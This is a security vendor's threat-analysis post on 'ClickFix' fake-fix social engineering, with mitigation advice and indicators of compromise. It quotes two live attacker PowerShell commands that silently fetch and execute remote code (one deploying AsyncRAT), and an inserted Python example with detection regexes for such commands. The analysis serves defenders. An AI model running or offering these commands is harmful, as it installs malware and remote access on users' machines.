
March 20, 2025

ClickFix: The rising threat of social engineering through fake fixes

By Ryan Slaney

With contributions from Edwin Dos Santos.


Attackers are always crafting new methods to bypass security measures and exploit human behavior. One of these new methods, known as ClickFix, has gained traction in recent months.

Field Effect has observed signs of this emerging threat in its own telemetry, with attackers actively testing this approach across different industries. In each case, the attack was rapidly blocked.

ClickFix is a social engineering tactic that manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance. By presenting fake error messages, CAPTCHA verifications, or system prompts, attackers convince users to take actions that compromise their devices, often by manually copying and pasting malicious commands into the command line.

How ClickFix works

The term ClickFix describes this attack’s core deception: convincing users to click on links or execute commands they believe will resolve a fictitious system issue presented to them by threat actors masquerading as trusted services, like Google Meet, Booking.com, or even IT support teams.

These fake system issues are delivered to targets via phishing emails, pop-up alerts, or misleading system messages. These delivery methods invoke a sense of urgency, leading users to unknowingly disable security controls, download malware, or grant attackers remote access.

A particularly dangerous aspect of ClickFix is when threat actors instruct users to manually copy and paste malicious code into command-line interfaces like PowerShell (Windows) or Terminal (Mac/Linux).

Because modern security solutions often block automated malware downloads, threat actors can bypass these security controls by socially engineering users into manually executing the commands themselves. If successful, threat actors gain the same level of system access as the victim, which can lead to data theft, credential compromise, or full system takeover.

Image 1: Fake error message instructing the user to copy code and execute it in PowerShell (Source: blog.sucuri.net)

Another alarming variation of the ClickFix tactic involves fake IT troubleshooting prompts. In recent attacks, users saw pop-ups instructing them to run PowerShell commands to "fix" a browser issue or re-enable account access.

In reality, these commands executed scripts that downloaded spyware or established backdoors for remote access.

Recent surge in ClickFix exploitation

Cybersecurity researchers have seen a sharp increase in ClickFix-based attacks since late 2024. Two prominent campaigns highlight the growing use of this method:

  1. OBSCURE#BAT campaign – This campaign targeted English-speaking users in the U.S., Canada, Germany, and the U.K., using fake CAPTCHA verification pages. Victims were directed to seemingly legitimate Cloudflare CAPTCHA pages, where they were tricked into copying and running a malicious batch script that installed malware.
  2. Storm-1865 phishing campaign – In this campaign, attackers impersonated Booking.com to target the hospitality industry in North America, Europe, and Asia. Emails claimed that businesses received a negative guest review, urging them to click a fraudulent link or open a PDF attachment. Victims who followed the instructions inadvertently exposed themselves to credential theft and malware infection.

Our team has seen an uptick in attempted ClickFix-style attacks in our own telemetry as well.

In one case, an employee of a North America-based non-profit was targeted by a ClickFix-style attack that attempted to trick the user into executing the following command:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h -c '$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'

This is a PowerShell command designed to stealthily download and execute a remote script. It first launches PowerShell in hidden mode to prevent users from noticing its execution. Then, it generates a timestamp-based identifier using the current Unix time, possibly to create a unique request for tracking or obfuscation. The command proceeds to retrieve a script from a remote server (138.199.161[.]141:8080) using Invoke-RestMethod (irm) and immediately executes it with Invoke-Expression (iex).

However, because the URL includes a dynamic timestamp, each request appears unique, which makes it harder for security tools to detect and block. The script is configured to deploy AsyncRAT on the victim’s machine. AsyncRAT is a powerful open-source remote access tool (RAT) designed for stealthy surveillance, keystroke logging, credential theft, and remote control of infected systems, often used by threat actors for persistent backdoor access.

IP address 138.199.161[.]141 is a German-based IP address that, according to Virus Total, has only been deemed malicious by one security vendor.

Image 2: Virus Total analysis of IP 138.199.161[.]141

In a second attempted attack seen in Field Effect telemetry, an unknown threat actor tried to socially engineer an employee of a Canadian construction company into executing the following command:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -W Hidden iwr -Uri 'https://overtimeforus[.]com/dow' -O $env:PUBLIC\\abc.msi;start $env:PUBLIC\\abc.msi # I am not a robot: Cloudflare Verification ID: 12Z-51P

This second PowerShell command is designed to silently download and execute a malicious MSI (Windows Installer) file. It first launches PowerShell in hidden mode (-W Hidden) and uses Invoke-WebRequest (iwr) to download a file from https[:]//overtimeforus.com/dow and saves it as abc.msi in the system’s public directory ($env:PUBLIC).

Once the download is complete, the command automatically executes the MSI file (start $env:PUBLIC\\abc.msi). This would likely install malware or a backdoor on the system, but unfortunately we weren’t able to retrieve the specific file to fully identify it.

The presence of a fake Cloudflare verification comment (# I am not a robot: Cloudflare Verification ID: 12Z-51P) suggests an attempt to disguise the script as a legitimate process, potentially tricking users into believing it's a security measure.
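To show how the two quoted commands can be recognised from process command lines, here is an added Python example (not code from this post or from Field Effect). It runs a handful of indicator patterns over constructed sample command lines that reproduce the two commands above plus a benign control, and it reproduces the first command's $u computation to show that the bitmask only changes the URL path every 16 seconds. The indicator names, the regular expressions and the sample lines are assumptions of this example.

```python
import re
from datetime import datetime, timezone

# Constructed sample process command lines (not log data from the post). The
# first two reproduce the commands quoted above; the third is benign for contrast.
SAMPLE_COMMANDS = [
    "'C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe' -w h -c "
    "'$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band "
    "0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'",
    "'C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe' -W Hidden "
    "iwr -Uri 'https://overtimeforus.com/dow' -O $env:PUBLIC\\abc.msi;"
    "start $env:PUBLIC\\abc.msi # I am not a robot: Cloudflare Verification ID: 12Z-51P",
    "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
]

# Each indicator is one behaviour the two quoted commands rely on (assumed names).
INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+h(?:idden)?\b",
    "download_cradle": r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b",
    "in_memory_exec": r"\b(?:iex|Invoke-Expression)\b",
    "installer_launch": r"\b(?:start|Start-Process|msiexec)\b[^;]*\.msi\b",
    "fake_captcha_comment": r"#.*(?:not a robot|verification id|captcha)",
}

def matched_indicators(cmdline):
    """Return the names of the indicators present in one command line."""
    return [name for name, pat in INDICATORS.items()
            if re.search(pat, cmdline, re.IGNORECASE)]

def is_clickfix_like(cmdline):
    """Flag a hidden PowerShell window that fetches something and then runs it
    (in memory or as a dropped MSI), or any command carrying a fake CAPTCHA comment."""
    hits = set(matched_indicators(cmdline))
    fetch_then_run = ("download_cradle" in hits
                      and bool(hits & {"in_memory_exec", "installer_launch"}))
    return ("hidden_window" in hits and fetch_then_run) or "fake_captcha_comment" in hits

def clickfix_request_id(unix_seconds):
    """Reproduce the first command's $u: Unix seconds with the low four bits
    cleared by the -band mask, so the value (and the URL path) only changes
    every 16 seconds rather than on every request."""
    return unix_seconds & ~0xF

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(is_clickfix_like(cmd), matched_indicators(cmd))
    print(clickfix_request_id(int(datetime.now(timezone.utc).timestamp())))
```

Because the identifier is stable for 16 seconds, blocking on the observed path alone is fragile; matching the host plus the hidden-window and fetch-then-run pattern holds up regardless of the timestamp.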

The URL contained in the second command, https[:]//overtimeforus.com/dow, has been deemed malicious by 10 security vendors on Virus Total.

Image 3: Virus Total analysis of https[:]//overtimeforus.com/dow

Conclusion

The ClickFix technique is a prime example of threat actors blending social engineering with technical deception to bypass security measures. By convincing users to execute malicious code themselves, attackers can evade traditional malware defenses and gain direct access to systems.

The best defense against this rising threat, and many others, is a multi-layered approach—restricting script execution, leveraging MDR solutions, and educating users about the risks of manually entering commands.

Organizations that take these steps will be better equipped to detect, prevent, and mitigate ClickFix-style attacks before they cause serious damage.

Mitigation

Protecting against ClickFix attacks requires a combination of technical security measures and user education. Field Effect recommends that organizations consider implementing the following defenses to mitigate the threat the ClickFix attack vector poses:

Restrict command line use

  • Enforce policies that limit PowerShell, Terminal, and CMD execution for non-administrative users.
  • Disable the ability to run scripts from untrusted sources and configure PowerShell execution policies to block unauthorized commands.

Deploy advanced threat detection solutions

  • Managed detection and response (MDR) services, such as Field Effect MDR, provide continuous monitoring and rapid identification of unusual command execution patterns.
  • Behavioral analysis tools can detect and flag suspicious user actions, such as copying commands from a browser into the command line.

Enhance email and web filtering

  • Block phishing emails that attempt to trick users into running malicious scripts (Field Effect MDR users can always use our built-in Suspicious Email Analysis Service to have one of our experts verify the validity of an email they deem suspicious).
  • Use sandboxing to inspect attachments and links before allowing them into inboxes.

Train users to recognize ClickFix tactics

  • Employees should be skeptical of unexpected troubleshooting instructions and never input any code into the command line prompt or PowerShell.
  • IT teams should regularly conduct phishing simulations to test and reinforce user awareness.

Maintain up-to-date security measures

  • Regularly update software and security policies to reduce exposure to known attack techniques.
  • Conduct vulnerability assessments to identify potential weaknesses before attackers do.

Indicators of compromise

138.199.161[.]141 – IP hosting malicious install script
https[:]//overtimeforus.com/dow – URL hosting malicious MSI file
75.2.78.236 – IP currently hosting https[:]//overtimeforus.com/dow
172.86.75[.]203 – Site serving fake captcha popup javascript
2pointmarkets[.]com – Site serving fake captcha popup javascript
Tecnogrup[.]com – Site serving fake captcha popup javascript
Timecorrector[.]com – Site serving fake captcha popup javascript
Terqlmaiwggbqca[.]top/1.php – URL to second stage
185.250.151[.]155 – IP currently hosting Terqlmaiwggbqca[.]top

If you have any questions or comments regarding this analysis, please contact us.